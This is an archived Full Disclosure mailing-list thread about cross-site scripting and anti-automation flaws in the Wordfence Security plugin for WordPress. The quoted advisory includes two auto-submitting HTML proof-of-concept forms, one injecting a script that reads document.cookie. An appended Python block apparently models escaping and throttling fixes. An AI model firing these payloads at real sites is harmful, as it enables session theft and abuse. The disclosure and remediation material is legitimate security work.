Full Disclosure mailing list archives
Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: Troy Rose <troyjrose () gmail com>
Date: Tue, 23 Oct 2012 16:53:42 +1100
It's a bit like having a security alarm for an open door, IMHO.

On 20 October 2012 04:37, Philip Whitehouse <philip () whiuk com> wrote:
> Hmm, another 'security' plugin with vulnerabilities... What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface?
>
> Philip Whitehouse
>
> On 19 Oct 2012, at 18:16, "MustLive" <mustlive () websecurity com ua> wrote:
>
>> Hello list!
>>
>> I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence is a security plugin for WordPress.
>>
>> -------------------------
>> Affected products:
>> -------------------------
>>
>> Wordfence Security 3.3.5 and previous versions are vulnerable.
>>
>> ----------
>> Details:
>> ----------
>>
>> XSS (WASC-08):
>>
>> Wordfence Security XSS.html
>>
>> <html>
>> <head>
>> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
>> </head>
>> <body onLoad="document.hack.submit()">
>> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
>> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>">
>> </form>
>> </body>
>> </html>
>>
>> Insufficient Anti-automation (WASC-21):
>>
>> Wordfence Security IAA.html
>>
>> <html>
>> <head>
>> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
>> </head>
>> <body onLoad="document.hack.submit()">
>> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
>> <input type="hidden" name="email" value="admin () e-mail com">
>> </form>
>> </body>
>> </html>
>>
>> I've informed the plugin developer about these vulnerabilities, and mentioned them at my site (http://websecurity.com.ua/6106/).
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
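A defensive model of the two fixes the quoted advisory calls for, added here as an example that is not part of the thread and not Wordfence's own code: the submitted address is validated and HTML-escaped before anything is echoed back (closing the reflected XSS), and unlock requests are throttled per client address (closing the anti-automation gap). Only the endpoint `?_wfsf=unlockEmail` and the `email` parameter come from the PoC; the class and function names, the limits, the status codes and the sample client address are assumptions.

```python
import html
import re
import time
from collections import defaultdict, deque

# Conservative address syntax check (assumed; the plugin's own validation is not shown).
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


class UnlockEmailThrottle:
    """Sliding-window limit on unlock requests per client IP (hypothetical defence)."""

    def __init__(self, max_requests=3, window_seconds=600):
        self.max_requests = max_requests
        self.window = window_seconds
        self._hits = defaultdict(deque)  # client_ip -> timestamps of recent requests

    def allow(self, client_ip, now=None):
        now = time.time() if now is None else now
        q = self._hits[client_ip]
        # Drop requests that have fallen out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True


def handle_unlock_email(email, client_ip, throttle, now=None):
    """Return (http_status, html_body) for a POST to ?_wfsf=unlockEmail.

    The raw parameter is never reflected: it is validated first and HTML-escaped
    before being echoed, so a payload like the PoC's <script> tag renders as text.
    """
    if not throttle.allow(client_ip, now):
        return 429, "<p>Too many unlock requests. Try again later.</p>"
    safe = html.escape(email, quote=True)
    if not EMAIL_RE.match(email):
        return 400, "<p>Invalid e-mail address: %s</p>" % safe
    return 200, "<p>If %s is an administrator address, an unlock link was sent.</p>" % safe
```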
Current thread:
- XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)